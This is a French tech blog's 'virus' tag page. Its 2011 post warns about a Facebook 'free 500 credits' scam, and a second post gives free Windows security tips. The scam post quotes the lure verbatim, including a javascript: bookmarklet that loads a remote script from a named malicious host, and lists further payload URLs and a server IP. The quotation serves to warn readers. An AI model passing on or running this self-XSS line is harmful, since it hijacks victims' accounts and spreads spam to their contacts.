FR EN ES

blog geek

Mot-clé - virus

Fil des billets - Fil des commentaires

mercredi 4 mai 2011

Attention au virus Facebook !

Par le mercredi 4 mai 2011, 23:25 - Facebook

facebook-virus.jpg

Faites très attention aux messages envoyés sur Facebook qui vous proposent de gagner 500 crédits facilement.

Hеy Guys, a friеnd οf mine fоund аn eхplоіt tһаt allows yоu to gеt 500 frеe crеdіts οn Facebοоk. 

Yοu сan uѕe tһеm fоr buying itеmѕ for virtuаl apps оn Facebook. 

Juѕt fоllow theѕе 3 steps:
 
1. Cοpy tһe follοwing javasсrіpt cоdе (һіghlight аnd press CTRL-C): 
 
javascript:(a=(b=document).createElement('script')).src='//5p52a.rafbgfb.info//f.js',b.body.appendChild(a);void(0)
 
2. Delеte the actual аddrеsѕ from the url fiеld іn yоur browѕer and paѕte thе соdе inѕteаd.
 
3. Preѕs Enter and wаit for a bit, іt сan tаke up to a mіnutе tо сomplеtе.
 
Tһаt's it! Yоur аcсοunt should now аppеar witһ 500 сrеdіtѕ.

If yоu аrе having trоuble wіtһ tһеѕе іnѕtructіοnѕ, try vіewіng tһe іnstruсtіоnѕ һеre: http://5p52a.rafbgfb.info/

it's where I learned it

Ce petit bout de script spam tous vos contacts très rapidement et se propage à une vitesse impressionnante sur Facebook.

Voici les URLs où est stocké ce petit virus javascript :

  • http://xxxx.rafbgfb.info/f.js
  • http://xxxx.ridfgdf.info/f.js
  • http://xxxx.riscbb.info/f.js
  • etc ....

Tous ces hosts semblent pointer vers une seule et même machine : 72.55.170.74

Le serveur qui héberge ce hack semble être localisé à Limassol à Chypre et fonctionne sous Linux. Quand on analyse le nombre de ports ouverts sur ce serveur, celui-ci a certainement du être hacké par l'auteur du virus et est utilisé pour propager le script malveillant ;-)

4 commentaires

mardi 12 avril 2011

7 conseils pour protéger gratuitement son PC sous Windows des Virus

Par le mardi 12 avril 2011, 19:05 - Sécurité informatique

securite-header.jpg

La sécurité informatique est un vaste sujet que peu de personnes maîtrisent et qui effraie la plupart des personnes novices en informatique.

Les fabricants d'anti-virus et de produits anti-Xware l'ont très bien compris et jouent sur cette crainte d'être infecté pour vendre des produits "qui font tout" aux particuliers. L'histoire de gagner encore plus d'argent, les licences vendues ne sont valables que sur une durée d'un an ...

Nombreux ont été les amis qui ont acheté un PC et qui m'ont demandé : "comment faire pour protéger gratuitement mon PC des pirates et des virus ?".

J'ai décidé d'en finir une fois pour toutes avec cette question en rédigeant cet article qui profitera à mes futurs amis et certainement à vous lecteur qui venez de tomber sur cet article par hasard ;-)

Si vous êtes sous Linux ou Mac, je vous propose d'allez faire un tour sur ce site spécialisé sur les Virus sous Linux et Mac.

Utilisez un pare-feu physique

securite-box.jpg

Rien ne remplace un pare-feu physique tel qu'une Freebox , une livebox ou une Neufbox avec le mode "routeur" activé ...

L'avantage d'un pare-feu physique par rapport à un pare-feu logiciel est très simple : un pare-feu sur une machine Windows pourra facilement être désactivé par un pirate ou un virus, alors que le routeur quant à lui sera plus difficilement attaquable.

Le routeur devrait dans un premier temps vous protéger de toutes les attaques entrantes, il est nécessaire maintenant de bloquer les autres canaux d'infection : Web et Email principalement.

Utilisez un navigateur régulièrement mis à jour

securite-browser.jpg

Arrêtez d'utiliser des navigateurs contenant des trous de sécurité. Utilisez un navigateur réputé comme sécurisé et régulièrement mis à jour par leur éditeur.

Utilisez Firefox ou Chrome par exemple. Evitez d'utiliser Internet Explorer qui possède jusqu'à aujourd'hui une très mauvaise réputation en terme de sécurité, Internet Explorer 9 sera-t-il plus sécurisé que ses prédécesseurs ?

En utilisant un navigateur sécurisé, cela vous permet d'éviter toutes les infections transmises par un site Web "infecté".

Faites attentions aux emails et aux pièces jointes

securite-mail.jpg

N'ouvrez pas les pièces jointes des emails provenant de personnes que vous ne connaissez pas et n'acceptez aucun autre type de pièce jointe outre les images et les PDF. Vérifiez bien l'extension des fichiers avant de cliquer dessus, assurez-vous qu'il ne s'agisse pas d'une extension déguisée comme "mon-fichier.jpg.exe" par exemple, ou bien "mon-document.pdf.bat".

Enfin, utilisez un client email robuste comme Thunderbird par exemple et mettez régulièrement à jour votre lecteur de PDF, les lecteurs PDF peuvent contenir des trous de sécurité importants pouvant permettre à un PDF d'introduire un virus sur votre PC.

Eviter de télécharger des applications sur les réseaux P2P

La plupart des applications que l'on peut trouver sur les réseaux P2P sont infectées par des trojans ou des virus. Evitez d'exécuter des logiciels de sources douteuses et soyez très vigilants avec les Cracks et les Keygen que l'on peut trouver ici et là.

Utilisez un anti-virus gratuit

Il existe de nombreux anti-virus payants sur le marché, parmi ces anti-virus, deux d'entre eux proposent des versions gratuites :

Ces versions gratuites proposent la même protection antivirale que les versions payantes, les seules fonctionnalités que n'offrent pas ces versions gratuites par rapport à leur version payante concernent principalement la gestion du pare-feu et la gestion des SPAM.

securite-avg.jpg

Depuis peu de temps Microsoft propose elle aussi une solution Antivirale gratuite :

Utilisez un Anti-Spyware

Maintenant que votre antivirus est installé et fonctionnel, je vous conseille de compléter la protection de votre PC par un Anti-spyware comme Spy-bot. Spy-bot est un excellent Freeware qui permet de scanner la présence de Spyware, Keylogger, Trojan .. etc sur votre PC.

Il complétera l'analyse de votre Anti-virus et vous permettra de vous assurer qu'aucun logiciel espion n'est installé sur votre PC.

securite-spybot.jpg

Vérifier vos connexions réseau (experts)

Le meilleur moyen de vérifier que votre PC ne communique pas avec Internet dans votre dos, c'est de vérifier les connexions sortantes et de s'assurer que les connexions réseau ouvertes correspondent à des services réels et non pas à un keylogger ou à un trojan ...

Pour cela, Microsoft fournit un outil gratuit qui se prénomme Windows TCPView et qui est téléchargeable gratuitement depuis le site de Microsoft.

Fermez toutes vos applications "communicantes" : Navigateur, client email, logiciel de chat et lancez TCPView.

securite-tcp.jpg

Triez les connexions en cliquant sur l'onglet "Remote Address", vous devriez ainsi voir toutes les connexions réseaux sortantes de votre PC et identifier les programmes qui sont connectés à une autre machine sur Internet.

Dans le cas ci-dessus, seuls Chrome, Adobe Update et Thunderbird possèdent des connexions vers Internet. Aucun service étrange n'est connecté. Faites très attention, certains programmes malicieux se déguisent en reprenant le nom de programmes connus comme Explorer.exe par exemple. Vérifiez bien les IP / nom d'hôte et au moindre doute sonnez l'alarme.

En respectant l'ensemble de ces conseils vous devriez vous prévenir gratuitement des infections virales et des logiciels espions. Au moindre doute, investissez dans la suite Internet Security à 40€ / an ou migrez vers Linux ;-)

8 commentaires

lundi 4 octobre 2010

Revue des blogs #295 : Une liste de news très Geek

Par le lundi 4 octobre 2010, 23:16 - Revue des blogs

revue,blog,news,geek

bullet Abonnez-vous à ces revues par feed rss news geek ou par email news geek
bullet Découvrez les anciennes revues
un commentaire

samedi 25 septembre 2010

Revue des blogs #291 : Une liste de news très Geek

Par le samedi 25 septembre 2010, 00:58 - Revue des blogs

revue,blog,news,geek

bullet Abonnez-vous à ces revues par feed rss news geek ou par email news geek
bullet Découvrez les anciennes revues
aucun commentaire

mardi 31 mars 2009

Revue des blogs #141 : Une liste de news très Geek !

Par le mardi 31 mars 2009, 00:06 - Revue des blogs

revue,blog,news,geek

bullet Abonnez-vous à ces revues par feed rss news geek ou par email news geek
bullet Découvrez les anciennes revues
aucun commentaire

- page 1 de 2

# Suivez Geeek ;-)



# A propos de l'auteur

Geeek est un blog édité par Ludovic Toinel.

Avec plus de 18 000 lecteurs RSS et plus de 100 000 visites par mois, Geeek est un blog dynamique avec une bonne visibilité.

En savoir plus ...


ipv6 tracker